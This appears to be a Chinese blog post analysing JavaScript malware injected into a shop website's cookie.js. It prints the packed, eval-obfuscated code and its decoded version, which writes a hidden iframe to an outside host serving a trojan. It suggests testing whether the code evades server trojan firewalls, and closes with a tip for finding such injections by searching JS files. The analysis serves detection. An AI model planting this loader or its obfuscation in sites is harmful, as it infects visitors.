JS文件掛馬代碼區(qū)分

這幾天， 朋友的頑皮屋商城被掛馬， 進入網(wǎng)站的時候， 卡巴斯基提示xxxx\cookie.js被掛iframe， 并且報iframe目的頁有馬。

打開cookie.js文件后， 發(fā)現(xiàn)其中多了如下代碼：

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c] c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4 a=3.7;4 9=a.x("6");w(9!=-1){}v{4 2=u t();2.s(2.r()+q*8*8*p);3.7="6=o;2="+2.n();3.m("<5 l=k://j.i.h/g/f.e d=c b=0></5>")}',34,34,' expires document var iframe cookiesleep cookie 60 start cookieString height 10 width asp as include org 3322 360safes http src write toGMTString test 1000 12 getTime setTime Date new else if indexOf'.split(' '),0,{}));

我想， 如果單單看這個代碼的話， 很難發(fā)現(xiàn)JS文件是被掛了iframe。 現(xiàn)在掛馬手段越來越高明， 掛的代碼都是經(jīng)過算法加密的。 讓大家不能簡單的找出掛馬。 估計這樣寫， 也是為了逃避服務器上安裝的一些木馬防火墻吧。 不知道有沒有人服務器上裝過木馬防火墻， 可以拿這個代碼試一下， 是否能躲避過木馬防火墻。

以上加密后的代碼最終運行的代碼為：

var cookieString=document.cookie;var start=cookieString.indexOf("cookiesleep");if(start!=-1){}else{var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie="cookiesleep=test;expires="+expires.toGMTString();document.write("<iframe src=http://360safes.3322.org/include/as.asp width=10 height=0></iframe>")}。

這里教大家一個簡單的搜索這種馬的方法：用editplus中的文件夾搜索， 搜索所有js文件， 搜索關鍵字為：eval和execute， 然后一個個去看， 一般都能找出這種JS木馬的。